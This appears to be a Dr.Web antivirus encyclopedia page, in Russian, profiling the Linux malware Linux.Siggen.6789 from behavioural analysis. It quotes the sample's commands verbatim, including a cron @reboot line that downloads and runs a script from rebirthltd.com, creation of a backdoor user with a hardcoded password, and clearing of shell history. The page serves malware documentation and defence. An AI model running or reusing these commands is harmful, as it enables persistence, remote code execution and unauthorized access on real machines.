Поддержка
Круглосуточная поддержка

Позвоните

Бесплатно по России:
8-800-333-79-32

ЧаВо | Форум

Ваши запросы

  • Все: -
  • Незакрытые: -
  • Последний: -

Позвоните

Бесплатно по России:
8-800-333-79-32

Свяжитесь с нами Незакрытые запросы: 

Профиль

Профиль

Linux.Siggen.6789

Добавлен в вирусную базу Dr.Web: 2024-03-18

Описание добавлено:

Техническая информация

Вредоносные функции:
Запускает себя в качестве демона
Подменяет имя приложения на:
  • /bin/bash
Запускает процессы:
  • /usr/bin/netkit-ftp ftp -n
  • /bin/sh -c firewall-cmd --zone=public --add-rich-rule=\x27rule family=\x22ipv4\x22 port protocol=\x22tcp\x22 port=\x2237215\x22 reject\x27
  • /bin/sh -c netsh advfirewall firewall add rule name=\x22Block_Port_37215_TCP\x22 dir=in action=block protocol=TCP localport=37215
  • /bin/sh -c echo \x22block drop in quick on any from 141.98.10.128\x22 | sudo pfctl -f -
  • /bin/sh -c netsh advfirewall firewall add rule name=\x22Block_IP_141.98.10.128\x22 dir=in action=block remoteip=141.98.10.128
  • crontab -
  • /sbin/xtables-multi iptables -A INPUT -p tcp --dport 59666 -j DROP
  • /bin/sh -c firewall-cmd --zone=public --add-port=59666/udp --permanent
  • /bin/sh -c echo \x22block drop proto tcp from any to any port 59666\x22 | sudo pfctl -f -
  • /bin/sh -c history -c
  • /bin/sh -c nft add rule ip filter input ip saddr 141.98.10.128 drop
  • crontab -l
  • /bin/sh -c firewall-cmd --zone=public --add-rich-rule=\x27rule family=\x22ipv4\x22 port protocol=\x22udp\x22 port=\x2237215\x22 reject\x27
  • /sbin/xtables-multi iptables -A INPUT -p udp --dport 59666 -j DROP
  • useradd -m Signalbot
  • /bin/sh -c echo \x22block drop proto udp from any to any port 59666\x22 | sudo pfctl -f -
  • /bin/sh -c nft add rule ip filter input udp dport 37215 drop
  • /bin/sh -c iptables -A INPUT -s 141.98.10.128 -j DROP
  • /sbin/xtables-multi iptables -A INPUT -p udp --dport 37215 -j DROP
  • /bin/sh -c ufw deny 59666/tcp
  • /bin/sh -c netsh advfirewall firewall add rule name=\x22Block_Port_59666_TCP\x22 dir=in action=block protocol=TCP localport=59666
  • /bin/sh -c iptables -A INPUT -p udp --dport 59666 -j DROP
  • /bin/sh -c echo \x22block drop proto udp from any to any port 37215\x22 | sudo pfctl -f -
  • /bin/sh -c ufw deny from 141.98.10.128
  • /bin/sh -c nft add rule ip filter input udp dport 59666 drop
  • /bin/sh -c netsh advfirewall firewall add rule name=\x22Block_Port_59666_UDP\x22 dir=in action=block protocol=UDP localport=59666
  • /bin/kmod /sbin/modprobe ip_tables
  • /bin/sh -c ufw deny 37215/tcp
  • /bin/sh -c netsh advfirewall firewall add rule name=\x22Block_Port_37215_UDP\x22 dir=in action=block protocol=UDP localport=37215
  • /bin/sh -c firewall-cmd --reload
  • /bin/sh -c (crontab -l ; echo \x22@reboot /bin/bash -c \x22/bin/wget http://rebirthltd.com/bins.sh; chmod 777 /bin/bins.sh; /bin/sh /bin/bins.sh; /bin/curl -k -L --output /bin/bins.sh http://rebirthltd.com/bins.sh; chmod +x /bin/bins.sh; /bin/sh /bin/bins.sh\x22\x22) | crontab -
  • /bin/sh -c echo \x22block drop proto tcp from any to any port 37215\x22 | sudo pfctl -f -
  • /sbin/xtables-multi iptables -A INPUT -s 141.98.10.128 -j DROP
  • ftp -n
  • /bin/sh -c iptables -A INPUT -p tcp --dport 59666 -j DROP
  • /sbin/xtables-multi iptables -A INPUT -p tcp --dport 37215 -j DROP
  • /bin/sh -c ufw deny 37215/udp
  • /bin/sh -c iptables -A INPUT -p tcp --dport 37215 -j DROP
  • /bin/sh -c echo \x22127.0.0.1 fucktheccp.top\x22 >> /etc/hosts
  • /bin/sh -c echo \x22127.0.0.1 reachedfucktheccp.top\x22 >> /etc/hosts
  • sudo pfctl -f -
  • /bin/sh -c nft add rule ip filter input tcp dport 37215 drop
  • /bin/sh -c useradd -m Signalbot
  • /bin/sh -c firewall-cmd --zone=public --add-port=59666/tcp --permanent
  • chpasswd
  • /bin/sh -c nft add rule ip filter input tcp dport 59666 drop
  • /bin/sh -c firewall-cmd --zone=public --add-source=141.98.10.128 --permanent
  • /bin/sh -c ufw deny 59666/udp
  • /bin/sh -c echo \x22Signalbot:ufobotz1337\x22 | chpasswd
  • /bin/sh -c iptables -A INPUT -p udp --dport 37215 -j DROP
Выполняет операции с файловой системой:
Модифицирует права доступа к файлам:
  • /home/Signalbot
  • /home/Signalbot/.bashrc
  • /home/Signalbot/.profile
  • /home/Signalbot/.bash_logout
  • /etc/passwd+
  • /etc/shadow+
  • /etc/group+
  • /etc/gshadow+
  • /etc/subuid+
  • /etc/subgid+
  • /etc/nshadow
Модифицирует владельца файлов:
  • /home/Signalbot
  • /home/Signalbot/.bashrc
  • /home/Signalbot/.profile
  • /home/Signalbot/.bash_logout
  • /etc/passwd+
  • /etc/shadow+
  • /etc/group+
  • /etc/gshadow+
  • /etc/subuid+
  • /etc/subgid+
  • /etc/nshadow
Создает папки:
  • /home/Signalbot
Удаляет папки:
  • /xconsole
  • /null
Создает символические ссылки (симлинки):
  • /etc/passwd.lock
  • /etc/group.lock
  • /etc/gshadow.lock
  • /etc/subuid.lock
  • /etc/subgid.lock
  • /etc/shadow.lock
Создает или модифицирует файлы:
  • /self
  • /proc/833/cmdline
  • /etc/.pwd.lock
  • /etc/passwd.835
  • /etc/group.835
  • /etc/gshadow.835
  • /etc/subuid.835
  • /etc/subgid.835
  • /etc/shadow.835
  • /var/log/faillog
  • /var/log/lastlog
  • /home/Signalbot/.bashrc
  • /home/Signalbot/.profile
  • /home/Signalbot/.bash_logout
  • /etc/passwd-
  • /etc/passwd+
  • /etc/shadow-
  • /etc/shadow+
  • /etc/group-
  • /etc/group+
  • /etc/gshadow-
  • /etc/gshadow+
  • /etc/subuid-
  • /etc/subuid+
  • /etc/subgid-
  • /etc/subgid+
  • /etc/nshadow
  • /etc/sudoers
  • /ip_addresses.txt
  • /etc/hosts
  • /dev/full
Удаляет файлы:
  • /etc/passwd.835
  • /etc/group.835
  • /etc/gshadow.835
  • /etc/subuid.835
  • /etc/subgid.835
  • /etc/shadow.835
  • /xconsole
  • /etc/shadow.lock
  • /etc/passwd.lock
  • /etc/group.lock
  • /etc/gshadow.lock
  • /etc/subuid.lock
  • /etc/subgid.lock
  • /null
Изменяет время создания/доступа/модификации файлов:
  • /home/Signalbot/.bashrc
  • /home/Signalbot/.profile
  • /home/Signalbot/.bash_logout
  • /etc/passwd-
  • /etc/shadow-
  • /etc/group-
  • /etc/gshadow-
  • /etc/subuid-
  • /etc/subgid-
Сетевая активность:
Ожидает входящих соединений на портах:
  • 127.0.0.1:8345
Устанавливает соединение:
  • 8.#.8.8:53
  • [:##]:37215
  • 127.0.0.1:37215
  • [:##]:59666
  • 127.0.0.1:59666

Рекомендации по лечению


Linux

На загруженной ОС выполните полную проверку всех дисковых разделов с использованием продукта Антивирус Dr.Web для Linux.

Демо бесплатно

На 1 месяц (без регистрации) или 3 месяца (с регистрацией и скидкой на продление)

Скачать Dr.Web

По серийному номеру